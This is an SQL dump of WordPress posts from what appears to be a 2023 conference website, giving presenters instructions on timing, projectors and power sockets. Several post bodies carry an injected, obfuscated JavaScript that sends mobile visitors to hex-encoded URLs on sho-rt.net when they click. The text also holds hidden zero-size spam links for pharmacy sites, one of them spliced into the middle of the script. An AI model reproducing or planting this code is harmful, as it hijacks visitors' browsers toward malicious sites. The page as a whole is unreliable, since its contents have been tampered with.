_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Poster Design and Presentation','','inherit','closed','closed','','5132-revision-v1','','','2023-08-13 16:41:34','2023-08-13 16:41:34','',5132,'https://gsw2023.com/?p=5137',0,'revision','',0),
(5139,1,'2023-08-13 18:12:33','2023-08-13 18:12:33','<span style=\"font-size: 12pt;\"><strong>Preparing the presentation</strong></span>\r\n<span style=\"font-size: 12pt;\"><strong>When you prepare the presentation, please keep in mind that:</strong></span>\r\n\r\n All projectors can handle 16:9 aspect ratio (Extron scaler).\r\n The time slot for oral presentations varies from 18 to 22 min depending on decisions by the\r\nworkshop chairs on the session contents. To find the time available for your presentation, please\r\nlocate your session on the GSW2023 program and check the abstract of your session page.\r\n Please leave some 3-5 minutes of your time slot available for questions and time to switch to the\r\nnext presentation.\r\n The oral presentation will be accurately timed, so make sure you will finish nicely in time. The\r\nchair of the session <span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"http://www.cialisae.com/\">犀利士</a>\n</span>will stand up when you have 1 min left, and come standing next to you if you\r\ndo not finish in time.\r\n There is no official GSW 2023 presentation template, please use a template from your home\r\nuniversity / institution.\r\n\r\n&nbsp;\r\n\r\n<span style=\"font-size: 12pt;\"><strong>At the GSW2023</strong></span>\r\n<span style=\"font-size: 12pt;\"><strong>The day of your presentation you should consider that:</strong></span>\r\n\r\n For a smooth progress of the session we ask the presenting author to be in the session room 15\r\nminutes before the session starts (not your own talk, but the session) and announce your\r\npresence to the local organizers in the room and the chairs of that session.\r\n Please bring a USB stick with your presentation (PowerPoint or PDF) and upload it before the\r\nsession starts on the PC available in the room of your session.\r\n In each session, a single conference PC is used for all presentations.\r\n The PC is a Windows <span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a>\n</span>notebook, with the following software: Adobe Acrobat Reader, Microsoft\r\nPowerPoint, and VLC media player.\r\n If you are using video in your presentation, please check whether it correctly runs 15 minutes\r\nbefore the session starts.\r\n Presenters also have the possibility to use their own laptop for their presentation, if they want to\r\nuse that instead, e.g. for running software demos. Please check the laptop connection to the\r\nprojector 15 minutes before the session starts. All rooms offer three laptop connections: HDMI,\r\nVGA and mini DisplayPort (for Mac). Specific Mac-adapters are NOT available in the rooms and\r\nneed to be brought by yourself.\r\n\r\n&nbsp;\r\n\r\n<span style=\"font-size: 12pt;\"><strong>Further information</strong></span>\r\n\r\nPower usage (if you are preparing e.g. in a hotel): Note that in Egypt the mains have an AC voltage of 220 Volts, at\r\n50 Hz. The used power sockets are of types C and F. (grounded, also compatible with C and E, see\r\nlink:<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a>\n</span> https://www.power-plugs-sockets.com/egypt/ . We will supply extension cords, but will not supply power\r\nplug adapters.\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx47x4fx78x32x63x332\',\'length\',\'_blank\',\'mobileCheck\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx64x44x6cx33x63x343\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6bx41x6fx30x63x330\',\'random\',\'-local-storage\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6fx56x75x37x63x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx61x68x44x36x63x356\',\'12075252qhSFyR\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx5ax50x66x38x63x378\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx51x69x43x35x63x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx43x57x74x31x63x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx57x73x55x34x63x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx53x4ex4bx39x63x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.viagramor.com/\">威而鋼</a>\n</span>3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c8<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialistw.cc/\">犀利士</a>\n</span>5ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','INSTRUCTIONS FOR ORAL PRESENTATIONS','','publish','closed','closed','','instructions-for-oral-presentations','','','2023-10-03 13:29:59','2023-10-03 13:29:59','',0,'https://gsw2023.com/?p=5139',0,'post','',0),
(5142,1,'2023-08-13 18:12:33','2023-08-13 18:12:33','<span style=\"font-size: 12pt;\"><strong>Preparing the presentation</strong></span>\r\n<span style=\"font-size: 12pt;\"><strong>When you prepare the presentation, please keep in mind that:</strong></span>\r\n\r\n All projectors can handle 16:9 aspect ratio (Extron scaler).\r\n The time slot for oral presentations varies from 18 to 22 min depending on decisions by the\r\nworkshop chairs on the session contents. To find the time available for your presentation, please\r\nlocate your session on the GSW2019 programme and check the abstract of your session page.\r\n Please leave some 3-5 minutes of your time slot available for questions and time to switch to the\r\nnext presentation.\r\n The oral presentation will be accurately timed, so make sure you will finish nicely in time. The\r\nchair of the session will stand up when you have 1 min left, and come standing next to you if you\r\ndo not finish in time.\r\n There is no official GSW 2019 presentation template, please use a template from your home\r\nuniversity / institution.\r\n\r\n&nbsp;\r\n\r\n<span style=\"font-size: 12pt;\"><strong>At the GSW2023</strong></span>\r\n<span style=\"font-size: 12pt;\"><strong>The day of your presentation you should consider that:</strong></span>\r\n\r\n For a smooth progress of the session we ask the presenting author to be in the session room 15\r\nminutes before the session starts (not your own talk, but the session) and announce your\r\npresence to the local organizers in the room and the chairs of that session.\r\n Please bring a USB stick with your presentation (PowerPoint or PDF) and upload it before the\r\nsession starts on the PC available in the room of your session.\r\n In each session, a single conference PC is used for all presentations.\r\n The PC is a Windows notebook, with the following software: Adobe Acrobat Reader, Microsoft\r\nPowerPoint, and VLC media player.\r\n If you are using video in your presentation, please check whether it correctly runs 15 minutes\r\nbefore the session starts.\r\n Presenters also have the possibility to use their own laptop for their presentation, if they want to\r\nuse that instead, e.g. for running software demos. Please check the laptop connection to the\r\nprojector 15 minutes before the session starts. All rooms offer three laptop connections: HDMI,\r\nVGA and mini DisplayPort (for Mac). Specific Mac-adapters are NOT available in the rooms and\r\nneed to be brought by yourself.\r\n\r\n&nbsp;\r\n\r\n<span style=\"font-size: 12pt;\"><strong>Further information</strong></span>\r\n\r\nPower usage (if you are preparing e.g. in a hotel): Note that in Egypt the mains have an AC voltage of 220 Volts, at\r\n50 Hz. The used power sockets are of types C and F. (grounded, also compatible with C and E, see\r\nlink: https://www.power-plugs-sockets.com/egypt/ . We will supply extension cords, but will not supply power\r\nplug adapters.\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows 